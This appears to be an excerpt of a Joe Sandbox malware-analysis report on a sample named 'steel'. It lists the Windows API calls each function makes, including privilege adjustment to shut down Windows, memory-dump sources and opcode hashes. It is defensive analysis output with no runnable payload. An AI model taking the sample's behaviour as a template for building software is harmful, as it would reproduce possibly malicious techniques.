                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021503AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 1948546556-0
                                                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021503AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                              • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                              • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                            • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                            • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                            • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021503AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                            • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,02168000,0040AA59,00000000), ref: 004076B3
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021503AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                            APIs
                                                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrev
                                                                                            • String ID:
                                                                                            • API String ID: 122130370-0
                                                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                            • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                            • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                            • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
